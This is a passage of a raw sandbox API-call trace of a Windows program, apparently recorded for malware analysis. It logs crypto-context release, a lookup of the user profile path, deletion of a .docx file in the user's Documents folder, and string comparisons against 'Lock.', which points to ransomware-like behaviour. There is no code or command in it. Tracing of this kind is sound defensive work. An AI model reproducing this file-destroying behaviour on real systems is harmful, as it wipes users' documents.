cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.208] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.208] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.208] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.208] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.208] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.208] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.208] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.209] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.209] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.209] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0222.209] CryptReleaseContext (hProv=0xa7c110, dwFlags=0x0) returned 1 [0222.209] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.209] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.210] FreeLibrary (hLibModule=0x76390000) returned 1 [0222.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.210] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.210] CloseHandle (hObject=0x50c) returned 1 [0222.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.211] CloseHandle (hObject=0x4dc) returned 1 [0222.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.215] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.215] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.215] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854dd0 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0222.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0222.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f6c0 [0222.217] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/YBBoLDeAtb.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx", lpFilePart=0x8cedf4*="YBBoLDeAtb.docx") returned 0x29 [0222.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0222.217] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ybboldeatb.docx")) returned 0x20 [0222.217] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86845f50, ftCreationTime.dwHighDateTime=0x1d5c297, ftLastAccessTime.dwLowDateTime=0x315a7740, ftLastAccessTime.dwHighDateTime=0x1d5cc50, ftLastWriteTime.dwLowDateTime=0x315a7740, ftLastWriteTime.dwHighDateTime=0x1d5cc50, nFileSizeHigh=0x0, nFileSizeLow=0x10984, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="YBBoLDeAtb.docx", cAlternateFileName="YBBOLD~1.DOC")) returned 0x9e1bf8 [0222.217] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ybboldeatb.docx")) returned 1 [0222.221] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86845f50, ftCreationTime.dwHighDateTime=0x1d5c297, ftLastAccessTime.dwLowDateTime=0x315a7740, ftLastAccessTime.dwHighDateTime=0x1d5cc50, ftLastWriteTime.dwLowDateTime=0x315a7740, ftLastWriteTime.dwHighDateTime=0x1d5cc50, nFileSizeHigh=0x0, nFileSizeLow=0x10984, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="YBBoLDeAtb.docx", cAlternateFileName="YBBOLD~1.DOC")) returned 0 [0222.221] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854dd0 | out: hHeap=0x2af0000) returned 1 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.221] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0222.222] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0222.222] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0222.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f780 [0222.223] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/YBBoLDeAtb.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx", lpFilePart=0x8cf650*="YBBoLDeAtb.docx") returned 0x29 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f780 | out: hHeap=0x2af0000) returned 1 [0222.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\YBBoLDeAtb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ybboldeatb.docx")) returned 0xffffffff [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38541a0 | out: hHeap=0x2af0000) returned 1 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0222.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0222.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zxF6sHlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xF6sHlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F6sHlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6sHlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sHlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HlM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lM0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M0JaF", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0222.225] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0222.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.226] 